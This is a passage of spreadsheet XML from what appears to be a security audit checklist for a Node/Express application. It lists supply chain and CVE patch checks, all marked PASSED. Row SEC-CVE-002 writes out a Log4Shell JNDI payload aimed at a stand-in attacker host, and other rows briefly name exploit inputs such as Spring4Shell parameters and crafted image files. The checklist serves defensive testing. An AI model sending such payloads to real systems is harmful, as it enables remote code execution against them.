        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C243" s="16" t="inlineStr">
        <is>
          <t>Third-Party API Dependency SLA Check</t>
        </is>
      </c>
      <c r="D243" s="16" t="inlineStr">
        <is>
          <t>Inspect fallback handling for external OpenRouter API outage</t>
        </is>
      </c>
      <c r="E243" s="16" t="inlineStr">
        <is>
          <t>External API outage mock</t>
        </is>
      </c>
      <c r="F243" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G243" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H243" s="16" t="inlineStr">
        <is>
          <t>Circuit breaker pattern handles API downtime gracefully with fallback UI</t>
        </is>
      </c>
    </row>
    <row r="244" ht="22" customHeight="1">
      <c r="A244" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-018</t>
        </is>
      </c>
      <c r="B244" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C244" s="16" t="inlineStr">
        <is>
          <t>Build Artifact Integrity Hashing</t>
        </is>
      </c>
      <c r="D244" s="16" t="inlineStr">
        <is>
          <t>Verify SHA-256 hash of compiled frontend build bundle</t>
        </is>
      </c>
      <c r="E244" s="16" t="inlineStr">
        <is>
          <t>SHA-256 build hash</t>
        </is>
      </c>
      <c r="F244" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G244" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H244" s="16" t="inlineStr">
        <is>
          <t>Build hash matches release manifest; Tampering detected if altered</t>
        </is>
      </c>
    </row>
    <row r="245" ht="22" customHeight="1">
      <c r="A245" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-019</t>
        </is>
      </c>
      <c r="B245" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C245" s="16" t="inlineStr">
        <is>
          <t>Container Base Image Minimization</t>
        </is>
      </c>
      <c r="D245" s="16" t="inlineStr">
        <is>
          <t>Inspect Dockerfile base image size and footprint</t>
        </is>
      </c>
      <c r="E245" s="16" t="inlineStr">
        <is>
          <t>Docker base image check</t>
        </is>
      </c>
      <c r="F245" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G245" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H245" s="16" t="inlineStr">
        <is>
          <t>Uses minimal Alpine / Distroless base image; Attack surface reduced</t>
        </is>
      </c>
    </row>
    <row r="246" ht="22" customHeight="1">
      <c r="A246" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-020</t>
        </is>
      </c>
      <c r="B246" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C246" s="16" t="inlineStr">
        <is>
          <t>Repository Dependabot Security Alerts</t>
        </is>
      </c>
      <c r="D246" s="16" t="inlineStr">
        <is>
          <t>Inspect GitHub Dependabot security alerts status</t>
        </is>
      </c>
      <c r="E246" s="16" t="inlineStr">
        <is>
          <t>Dependabot status audit</t>
        </is>
      </c>
      <c r="F246" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G246" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H246" s="16" t="inlineStr">
        <is>
          <t>Dependabot enabled with automated security patch PR workflows</t>
        </is>
      </c>
    </row>
    <row r="247" ht="22" customHeight="1">
      <c r="A247" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-021</t>
        </is>
      </c>
      <c r="B247" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C247" s="16" t="inlineStr">
        <is>
          <t>Supply Chain Typosquatting Lock Protection</t>
        </is>
      </c>
      <c r="D247" s="16" t="inlineStr">
        <is>
          <t>Check for lockfile modification during npm install</t>
        </is>
      </c>
      <c r="E247" s="16" t="inlineStr">
        <is>
          <t>npm ci enforcement</t>
        </is>
      </c>
      <c r="F247" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G247" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H247" s="16" t="inlineStr">
        <is>
          <t>CI builds enforce `npm ci` to prevent lockfile modification</t>
        </is>
      </c>
    </row>
    <row r="248" ht="22" customHeight="1">
      <c r="A248" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-022</t>
        </is>
      </c>
      <c r="B248" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C248" s="16" t="inlineStr">
        <is>
          <t>Package Download Integrity Verification</t>
        </is>
      </c>
      <c r="D248" s="16" t="inlineStr">
        <is>
          <t>Verify TLS certificate of npm registry endpoint</t>
        </is>
      </c>
      <c r="E248" s="16" t="inlineStr">
        <is>
          <t>npm registry TLS check</t>
        </is>
      </c>
      <c r="F248" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G248" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H248" s="16" t="inlineStr">
        <is>
          <t>npm config enforces HTTPS registry URL with TLS 1.3</t>
        </is>
      </c>
    </row>
    <row r="249" ht="22" customHeight="1">
      <c r="A249" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-023</t>
        </is>
      </c>
      <c r="B249" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C249" s="16" t="inlineStr">
        <is>
          <t>Open-Source Component CVE Monitoring</t>
        </is>
      </c>
      <c r="D249" s="16" t="inlineStr">
        <is>
          <t>Check components against CVE-2023 / CVE-2024 security advisories</t>
        </is>
      </c>
      <c r="E249" s="16" t="inlineStr">
        <is>
          <t>CVE database check</t>
        </is>
      </c>
      <c r="F249" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G249" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H249" s="16" t="inlineStr">
        <is>
          <t>All components patched against known public CVE exploits</t>
        </is>
      </c>
    </row>
    <row r="250" ht="22" customHeight="1">
      <c r="A250" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-024</t>
        </is>
      </c>
      <c r="B250" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C250" s="16" t="inlineStr">
        <is>
          <t>Developer Workspace Environment Hardening</t>
        </is>
      </c>
      <c r="D250" s="16" t="inlineStr">
        <is>
          <t>Inspect developer workstation security policy compliance</t>
        </is>
      </c>
      <c r="E250" s="16" t="inlineStr">
        <is>
          <t>Workstation audit</t>
        </is>
      </c>
      <c r="F250" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G250" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H250" s="16" t="inlineStr">
        <is>
          <t>Developer environments enforce disk encryption &amp; multi-factor auth</t>
        </is>
      </c>
    </row>
    <row r="251" ht="22" customHeight="1">
      <c r="A251" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-025</t>
        </is>
      </c>
      <c r="B251" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C251" s="16" t="inlineStr">
        <is>
          <t>Third-Party CDN Fallback Security</t>
        </is>
      </c>
      <c r="D251" s="16" t="inlineStr">
        <is>
          <t>Simulate CDN outage for external font / script asset</t>
        </is>
      </c>
      <c r="E251" s="16" t="inlineStr">
        <is>
          <t>CDN outage simulation</t>
        </is>
      </c>
      <c r="F251" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G251" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H251" s="16" t="inlineStr">
        <is>
          <t>Local fallback assets loaded automatically without application failure</t>
        </is>
      </c>
    </row>
    <row r="252" ht="22" customHeight="1">
      <c r="A252" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-026</t>
        </is>
      </c>
      <c r="B252" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C252" s="16" t="inlineStr">
        <is>
          <t>NPM Package Provenance Attestation Check</t>
        </is>
      </c>
      <c r="D252" s="16" t="inlineStr">
        <is>
          <t>Inspect build provenance attestations for published packages</t>
        </is>
      </c>
      <c r="E252" s="16" t="inlineStr">
        <is>
          <t>NPM provenance check</t>
        </is>
      </c>
      <c r="F252" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G252" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H252" s="16" t="inlineStr">
        <is>
          <t>Build provenance signatures verified against GitHub OIDC issuer</t>
        </is>
      </c>
    </row>
    <row r="253" ht="22" customHeight="1">
      <c r="A253" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-027</t>
        </is>
      </c>
      <c r="B253" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C253" s="16" t="inlineStr">
        <is>
          <t>Internal Package Namespace Reservation</t>
        </is>
      </c>
      <c r="D253" s="16" t="inlineStr">
        <is>
          <t>Reserve internal corporate scope names on public npm registry</t>
        </is>
      </c>
      <c r="E253" s="16" t="inlineStr">
        <is>
          <t>Registry scope reservation</t>
        </is>
      </c>
      <c r="F253" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G253" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H253" s="16" t="inlineStr">
        <is>
          <t>Internal package scope registered on npm to prevent namespace confusion</t>
        </is>
      </c>
    </row>
    <row r="254" ht="22" customHeight="1">
      <c r="A254" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-028</t>
        </is>
      </c>
      <c r="B254" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C254" s="16" t="inlineStr">
        <is>
          <t>Node Engine Version Locking in Package Manifest</t>
        </is>
      </c>
      <c r="D254" s="16" t="inlineStr">
        <is>
          <t>Inspect engines field in root package.json</t>
        </is>
      </c>
      <c r="E254" s="16" t="inlineStr">
        <is>
          <t>Engine locking check</t>
        </is>
      </c>
      <c r="F254" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G254" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H254" s="16" t="inlineStr">
        <is>
          <t>Strict engine version locking specified (`"node": "&gt;=20.0.0"`)</t>
        </is>
      </c>
    </row>
    <row r="255" ht="22" customHeight="1">
      <c r="A255" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-029</t>
        </is>
      </c>
      <c r="B255" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C255" s="16" t="inlineStr">
        <is>
          <t>Vendor Asset Binary Integrity Check</t>
        </is>
      </c>
      <c r="D255" s="16" t="inlineStr">
        <is>
          <t>Verify hash checksum of downloaded binary tools</t>
        </is>
      </c>
      <c r="E255" s="16" t="inlineStr">
        <is>
          <t>Binary hash check</t>
        </is>
      </c>
      <c r="F255" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G255" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H255" s="16" t="inlineStr">
        <is>
          <t>Binary tool downloads verified against official publisher SHA-256 checksums</t>
        </is>
      </c>
    </row>
    <row r="256" ht="22" customHeight="1">
      <c r="A256" s="15" t="inlineStr">
        <is>
          <t>SEC-SUP-030</t>
        </is>
      </c>
      <c r="B256" s="16" t="inlineStr">
        <is>
          <t>Supply Chain &amp; Dependencies</t>
        </is>
      </c>
      <c r="C256" s="16" t="inlineStr">
        <is>
          <t>Automated Security Patch Deployment SLA</t>
        </is>
      </c>
      <c r="D256" s="16" t="inlineStr">
        <is>
          <t>Check mean time to remediate (MTTR) critical security patches</t>
        </is>
      </c>
      <c r="E256" s="16" t="inlineStr">
        <is>
          <t>Patch SLA check</t>
        </is>
      </c>
      <c r="F256" s="20" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="G256" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H256" s="16" t="inlineStr">
        <is>
          <t>Critical security patches deployed to production environment within 24 hours</t>
        </is>
      </c>
    </row>
    <row r="257" ht="22" customHeight="1">
      <c r="A257" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-001</t>
        </is>
      </c>
      <c r="B257" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C257" s="16" t="inlineStr">
        <is>
          <t>OpenSSL Vulnerability Patch Audit</t>
        </is>
      </c>
      <c r="D257" s="16" t="inlineStr">
        <is>
          <t>Inspect system OpenSSL library version (CVE-2023-0286)</t>
        </is>
      </c>
      <c r="E257" s="16" t="inlineStr">
        <is>
          <t>OpenSSL version check</t>
        </is>
      </c>
      <c r="F257" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G257" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H257" s="16" t="inlineStr">
        <is>
          <t>Patched to OpenSSL 3.0.8+; Vulnerability mitigated</t>
        </is>
      </c>
    </row>
    <row r="258" ht="22" customHeight="1">
      <c r="A258" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-002</t>
        </is>
      </c>
      <c r="B258" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C258" s="16" t="inlineStr">
        <is>
          <t>Log4j / Log4Shell (CVE-2021-44228) Check</t>
        </is>
      </c>
      <c r="D258" s="16" t="inlineStr">
        <is>
          <t>Send payload ${jndi:ldap://attacker.com/a} in all headers</t>
        </is>
      </c>
      <c r="E258" s="16" t="inlineStr">
        <is>
          <t>Log4Shell payload</t>
        </is>
      </c>
      <c r="F258" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G258" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H258" s="16" t="inlineStr">
        <is>
          <t>Java Log4j absent; Node.js logging engine immune to JNDI lookups</t>
        </is>
      </c>
    </row>
    <row r="259" ht="22" customHeight="1">
      <c r="A259" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-003</t>
        </is>
      </c>
      <c r="B259" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C259" s="16" t="inlineStr">
        <is>
          <t>Spring4Shell (CVE-2022-22965) Check</t>
        </is>
      </c>
      <c r="D259" s="16" t="inlineStr">
        <is>
          <t>Send class.module.classLoader parameters to API</t>
        </is>
      </c>
      <c r="E259" s="16" t="inlineStr">
        <is>
          <t>Spring4Shell payload</t>
        </is>
      </c>
      <c r="F259" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G259" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H259" s="16" t="inlineStr">
        <is>
          <t>Spring framework absent; Node/Express stack unaffected</t>
        </is>
      </c>
    </row>
    <row r="260" ht="22" customHeight="1">
      <c r="A260" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-004</t>
        </is>
      </c>
      <c r="B260" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C260" s="16" t="inlineStr">
        <is>
          <t>HTTP/2 Rapid Reset (CVE-2023-44487) Mitigation</t>
        </is>
      </c>
      <c r="D260" s="16" t="inlineStr">
        <is>
          <t>Send stream reset frame burst over HTTP/2 connection</t>
        </is>
      </c>
      <c r="E260" s="16" t="inlineStr">
        <is>
          <t>HTTP/2 Rapid Reset burst</t>
        </is>
      </c>
      <c r="F260" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G260" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H260" s="16" t="inlineStr">
        <is>
          <t>Reverse proxy (Nginx) patched with stream concurrency limits</t>
        </is>
      </c>
    </row>
    <row r="261" ht="22" customHeight="1">
      <c r="A261" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-005</t>
        </is>
      </c>
      <c r="B261" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C261" s="16" t="inlineStr">
        <is>
          <t>curl / libcurl Security Vulnerability Check</t>
        </is>
      </c>
      <c r="D261" s="16" t="inlineStr">
        <is>
          <t>Inspect curl version for CVE-2023-38606 vulnerabilities</t>
        </is>
      </c>
      <c r="E261" s="16" t="inlineStr">
        <is>
          <t>curl version audit</t>
        </is>
      </c>
      <c r="F261" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G261" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H261" s="16" t="inlineStr">
        <is>
          <t>curl updated to latest secure release; Buffer overflow patched</t>
        </is>
      </c>
    </row>
    <row r="262" ht="22" customHeight="1">
      <c r="A262" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-006</t>
        </is>
      </c>
      <c r="B262" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C262" s="16" t="inlineStr">
        <is>
          <t>Bcrypt Implementation Round Salt Security</t>
        </is>
      </c>
      <c r="D262" s="16" t="inlineStr">
        <is>
          <t>Inspect bcrypt cost factor setting in auth module</t>
        </is>
      </c>
      <c r="E262" s="16" t="inlineStr">
        <is>
          <t>Bcrypt cost factor check</t>
        </is>
      </c>
      <c r="F262" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G262" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H262" s="16" t="inlineStr">
        <is>
          <t>Work factor set to 12; Resists GPU hash cracking attempts</t>
        </is>
      </c>
    </row>
    <row r="263" ht="22" customHeight="1">
      <c r="A263" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-007</t>
        </is>
      </c>
      <c r="B263" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C263" s="16" t="inlineStr">
        <is>
          <t>Linux Kernel Privilege Escalation (Dirty Pipe) Check</t>
        </is>
      </c>
      <c r="D263" s="16" t="inlineStr">
        <is>
          <t>Inspect kernel version for CVE-2022-0847</t>
        </is>
      </c>
      <c r="E263" s="16" t="inlineStr">
        <is>
          <t>uname -r kernel check</t>
        </is>
      </c>
      <c r="F263" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G263" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H263" s="16" t="inlineStr">
        <is>
          <t>Linux kernel patched to version 5.15.0-60+; Exploit mitigated</t>
        </is>
      </c>
    </row>
    <row r="264" ht="22" customHeight="1">
      <c r="A264" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-008</t>
        </is>
      </c>
      <c r="B264" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C264" s="16" t="inlineStr">
        <is>
          <t>sudo Privilege Escalation (Baron Samedit) Check</t>
        </is>
      </c>
      <c r="D264" s="16" t="inlineStr">
        <is>
          <t>Inspect sudo binary version for CVE-2021-3156</t>
        </is>
      </c>
      <c r="E264" s="16" t="inlineStr">
        <is>
          <t>sudo --version check</t>
        </is>
      </c>
      <c r="F264" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G264" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H264" s="16" t="inlineStr">
        <is>
          <t>sudo updated to patched version; Heap overflow prevented</t>
        </is>
      </c>
    </row>
    <row r="265" ht="22" customHeight="1">
      <c r="A265" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-009</t>
        </is>
      </c>
      <c r="B265" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C265" s="16" t="inlineStr">
        <is>
          <t>Polkit (Pkeyexec) Vulnerability Check</t>
        </is>
      </c>
      <c r="D265" s="16" t="inlineStr">
        <is>
          <t>Inspect pkexec installation permissions</t>
        </is>
      </c>
      <c r="E265" s="16" t="inlineStr">
        <is>
          <t>CVE-2021-4034 check</t>
        </is>
      </c>
      <c r="F265" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G265" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H265" s="16" t="inlineStr">
        <is>
          <t>Pkeyexec patched / permissions restricted (chmod 0755)</t>
        </is>
      </c>
    </row>
    <row r="266" ht="22" customHeight="1">
      <c r="A266" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-010</t>
        </is>
      </c>
      <c r="B266" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C266" s="16" t="inlineStr">
        <is>
          <t>Ghostscript RCE Vulnerability Check</t>
        </is>
      </c>
      <c r="D266" s="16" t="inlineStr">
        <is>
          <t>Upload PostScript file (.ps) to image processing module</t>
        </is>
      </c>
      <c r="E266" s="16" t="inlineStr">
        <is>
          <t>Ghostscript exploit file</t>
        </is>
      </c>
      <c r="F266" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G266" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H266" s="16" t="inlineStr">
        <is>
          <t>Ghostscript component uninstalled; ImageMagick policy disables PS/EPS</t>
        </is>
      </c>
    </row>
    <row r="267" ht="22" customHeight="1">
      <c r="A267" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-011</t>
        </is>
      </c>
      <c r="B267" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C267" s="16" t="inlineStr">
        <is>
          <t>ImageMagick Heap Overflow (CVE-2023-34151) Check</t>
        </is>
      </c>
      <c r="D267" s="16" t="inlineStr">
        <is>
          <t>Upload crafted corrupt TIFF image file</t>
        </is>
      </c>
      <c r="E267" s="16" t="inlineStr">
        <is>
          <t>Corrupt TIFF payload</t>
        </is>
      </c>
      <c r="F267" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G267" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H267" s="16" t="inlineStr">
        <is>
          <t>ImageMagick updated to latest version; Memory limits enforced</t>
        </is>
      </c>
    </row>
    <row r="268" ht="22" customHeight="1">
      <c r="A268" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-012</t>
        </is>
      </c>
      <c r="B268" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C268" s="16" t="inlineStr">
        <is>
          <t>Node.js Buffer Memory Exposure Check</t>
        </is>
      </c>
      <c r="D268" s="16" t="inlineStr">
        <is>
          <t>Inspect usage of Buffer.allocUnsafe() in codebase</t>
        </is>
      </c>
      <c r="E268" s="16" t="inlineStr">
        <is>
          <t>Code audit for Buffer()</t>
        </is>
      </c>
      <c r="F268" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G268" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H268" s="16" t="inlineStr">
        <is>
          <t>Buffer.allocUnsafe() replaced with zero-filled Buffer.alloc()</t>
        </is>
      </c>
    </row>
    <row r="269" ht="22" customHeight="1">
      <c r="A269" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-013</t>
        </is>
      </c>
      <c r="B269" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C269" s="16" t="inlineStr">
        <is>
          <t>Node.js VM Module Sandbox Escape Protection</t>
        </is>
      </c>
      <c r="D269" s="16" t="inlineStr">
        <is>
          <t>Inspect VM sandbox execution logic for untrusted code</t>
        </is>
      </c>
      <c r="E269" s="16" t="inlineStr">
        <is>
          <t>VM Sandbox escape check</t>
        </is>
      </c>
      <c r="F269" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G269" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H269" s="16" t="inlineStr">
        <is>
          <t>vm2 / vm module replaced with isolated worker process / WebAssembly</t>
        </is>
      </c>
    </row>
    <row r="270" ht="22" customHeight="1">
      <c r="A270" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-014</t>
        </is>
      </c>
      <c r="B270" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C270" s="16" t="inlineStr">
        <is>
          <t>Express.js Query Parser Vulnerability Check</t>
        </is>
      </c>
      <c r="D270" s="16" t="inlineStr">
        <is>
          <t>Send nested query array objects ?a[b][c][d]=1</t>
        </is>
      </c>
      <c r="E270" s="16" t="inlineStr">
        <is>
          <t>Deep query parameter</t>
        </is>
      </c>
      <c r="F270" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G270" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H270" s="16" t="inlineStr">
        <is>
          <t>qs query parser depth limited to 5 levels; Prototype pollution prevented</t>
        </is>
      </c>
    </row>
    <row r="271" ht="22" customHeight="1">
      <c r="A271" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-015</t>
        </is>
      </c>
      <c r="B271" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C271" s="16" t="inlineStr">
        <is>
          <t>Axios SSRF / Header Leak Check (CVE-2023-45857)</t>
        </is>
      </c>
      <c r="D271" s="16" t="inlineStr">
        <is>
          <t>Make request with Axios following cross-origin redirect</t>
        </is>
      </c>
      <c r="E271" s="16" t="inlineStr">
        <is>
          <t>Axios redirect check</t>
        </is>
      </c>
      <c r="F271" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G271" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H271" s="16" t="inlineStr">
        <is>
          <t>Axios updated to 1.6.0+; Sensitive headers stripped on redirect</t>
        </is>
      </c>
    </row>
    <row r="272" ht="22" customHeight="1">
      <c r="A272" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-016</t>
        </is>
      </c>
      <c r="B272" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C272" s="16" t="inlineStr">
        <is>
          <t>JWT Library Key Tampering Vulnerability Check</t>
        </is>
      </c>
      <c r="D272" s="16" t="inlineStr">
        <is>
          <t>Inspect jsonwebtoken package version for CVE-2022-23529</t>
        </is>
      </c>
      <c r="E272" s="16" t="inlineStr">
        <is>
          <t>jsonwebtoken version check</t>
        </is>
      </c>
      <c r="F272" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G272" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H272" s="16" t="inlineStr">
        <is>
          <t>jsonwebtoken patched to 9.0.0+; Secret verification secured</t>
        </is>
      </c>
    </row>
    <row r="273" ht="22" customHeight="1">
      <c r="A273" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-017</t>
        </is>
      </c>
      <c r="B273" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C273" s="16" t="inlineStr">
        <is>
          <t>Pg Driver SQL Injection Edge-Case Check</t>
        </is>
      </c>
      <c r="D273" s="16" t="inlineStr">
        <is>
          <t>Inspect pg driver version for CVE-2024-34508</t>
        </is>
      </c>
      <c r="E273" s="16" t="inlineStr">
        <is>
          <t>pg package version check</t>
        </is>
      </c>
      <c r="F273" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G273" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H273" s="16" t="inlineStr">
        <is>
          <t>pg driver updated to 8.11.4+; Parameter binding safe</t>
        </is>
      </c>
    </row>
    <row r="274" ht="22" customHeight="1">
      <c r="A274" s="15" t="inlineStr">
        <is>
          <t>SEC-CVE-018</t>
        </is>
      </c>
      <c r="B274" s="16" t="inlineStr">
        <is>
          <t>CVE Patches &amp; Component Audits</t>
        </is>
      </c>
      <c r="C274" s="16" t="inlineStr">
        <is>
          <t>Helmet Middleware Security Header Version</t>
        </is>
      </c>
      <c r="D274" s="16" t="inlineStr">
        <is>
          <t>Inspect helmet package version in Express app</t>
        </is>
      </c>
      <c r="E274" s="16" t="inlineStr">
